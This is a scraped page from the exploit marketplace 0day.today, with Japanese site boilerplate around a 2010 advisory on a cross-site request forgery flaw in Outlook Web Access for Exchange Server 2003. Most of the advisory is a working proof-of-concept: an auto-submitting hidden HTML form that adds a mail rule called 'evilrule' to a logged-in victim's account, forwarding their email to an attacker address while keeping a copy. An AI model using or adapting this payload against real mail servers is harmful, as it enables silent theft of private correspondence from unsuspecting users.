0day.today - 最大、世界でのデータベースを利用します。
![](/img/logo_green.jpg)
- 私たちは一つのメインのドメインを使用します。http://0day.today
- 材料のほとんどは 完全に無料
- あなたがしたい場合は エクスプロイトを購入 / V.I.P.を取得アクセス または任意の他のサービスのために支払います、
あなたが購入したり、獲得する必要があります金
ログイン このサイトの管理者が使用しています公式の連絡先.詐欺師にご注意!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
次の方法でご連絡することができます:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Outlook Web Access 2003 CSRF Vulnerability
========================================== Outlook Web Access 2003 CSRF Vulnerability ========================================== # Exploit Title: Microsoft Office Outlook Web Access for Exchange Server 2003 XSRF Vulnerability # Date: 07/20/2010 # Author: anonymous # Tested on: Microsoft Office Outlook Web Access for Exchange Server 2003 A cross-site request forgery vulnerability in Microsoft Office Outlook Web Access for Exchange Server 2003 can be exploited to add an automatic forwarding rule (as PoC) to the authenticated user's account. PoC: <form name="xsrf" action="http://exchange.victim.com/Exchange/victim_id" method="post" target="_self"> <input type="hidden" name="cmd" value="saverule"> <input type="hidden" name="rulename" value="evilrule"> <input type="hidden" name="ruleaction" value="3"> <input type="hidden" name="forwardtocount" value="1"> <input type="hidden" name="forwardtoname" value="guy, bad"> <input type="hidden" name="forwardtoemail" value="[email protected]"> <input type="hidden" name="forwardtotype" value="SMTP"> <input type="hidden" name="forwardtoentryid" value=""> <input type="hidden" name="forwardtosearchkey" value=""> <input type="hidden" name="forwardtoisdl" value=""> <input type="hidden" name="keepcopy" value="1"> <body onload="document.forms.xsrf.submit();"> # 0day.today [2024-07-16] #